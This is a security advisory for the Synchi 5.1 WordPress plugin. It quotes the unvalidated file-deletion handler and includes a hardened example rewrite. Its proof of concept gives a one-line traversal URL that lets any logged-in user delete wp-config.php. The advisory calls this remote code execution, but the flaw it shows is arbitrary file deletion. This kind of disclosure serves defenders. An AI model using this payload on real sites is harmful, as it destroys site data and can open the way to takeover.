Details
- Name : Synchi
- Version : 5.1
- Homepage : https://wordpress.org/plugins/synchi/
Type
- Remote Code Execution - RCE
Description
- User access required: any registered user.
- $_REQUEST['filename'] is not escaped or validated before it is passed to is_dir(), synchi_delete_directory() and unlink().
Code
Path: /wp-content/plugins/synchi/synchi.php
Line: 490
function synchi_action_delete_file()
{
    // get filename
    $filename = $_REQUEST['filename'];
    if (is_dir($filename)) $success = synchi_delete_directory($filename);
    else $success = unlink($filename);
    if ($success) synchi_ajax_response(true);
    else synchi_ajax_error("Unable to delete file/folder!");
}
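A hardened form of the handler above, as an added example (not the plugin's or the vendor's code). The names synchi_confine_path and synchi_action_delete_file_hardened, the manage_options capability, the nonce action synchi_delete_file and the choice of WP_CONTENT_DIR as the allowed base directory are all assumptions.

```php
<?php
// Added example, not the plugin's code: confinement check plus a hardened handler.
// Return the canonical path of $requested only if it lies strictly inside $base.
function synchi_confine_path(string $base, string $requested)
{
    $base = realpath($base);
    // realpath('') resolves to the working directory, so reject it explicitly.
    if ($base === false || $requested === '') return false;
    $real = realpath($requested);   // collapses ../ and resolves symlinks
    if ($real === false) return false;
    // Compare with a trailing separator so /base-old does not match /base.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : false;
}

function synchi_action_delete_file_hardened()
{
    // Assumption: deleting files is an administrator-only operation.
    if (!current_user_can('manage_options')) {
        synchi_ajax_error("Unable to delete file/folder!");
        return;
    }
    // Assumption: the page issuing the request embeds a nonce for this action.
    check_ajax_referer('synchi_delete_file');
    $raw = $_REQUEST['filename'] ?? '';
    // Assumption: the plugin only needs to manage files under wp-content.
    $filename = is_string($raw) ? synchi_confine_path(WP_CONTENT_DIR, wp_unslash($raw)) : false;
    if ($filename === false) {
        synchi_ajax_error("Unable to delete file/folder!");
        return;
    }
    if (is_dir($filename)) $success = synchi_delete_directory($filename);
    else $success = unlink($filename);
    if ($success) synchi_ajax_response(true);
    else synchi_ajax_error("Unable to delete file/folder!");
}

// Stand-alone demonstration on a constructed directory tree (CLI, outside WordPress).
if (PHP_SAPI === 'cli' && !defined('ABSPATH')) {
    $site = sys_get_temp_dir() . '/synchi_demo_' . getmypid();
    mkdir("$site/wp-content", 0700, true);
    touch("$site/wp-config.php"); touch("$site/wp-content/a.txt");
    foreach (["$site/wp-content/a.txt", "$site/wp-content/../wp-config.php", ''] as $p) {
        $ok = synchi_confine_path("$site/wp-content", $p);
        echo ($ok === false ? 'rejected' : 'allowed'), "  ", var_export($p, true), "\n";
    }
    unlink("$site/wp-content/a.txt"); unlink("$site/wp-config.php");
    rmdir("$site/wp-content"); rmdir($site);
}
```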
Proof of Concept
1 - Log in as any user.
2 - Access the URL:
http://target/wp-admin/?synchi_action&synchi_action=delete_file&filename=../wp-config.php
Results
wp-config.php is deleted and the whole system restarts.
Note
Solution
Timeline
- Date Discovery : 11/22/2017
- Date Vendor Contact : 12/24/2017
- Date Publish :
- Date Resolution :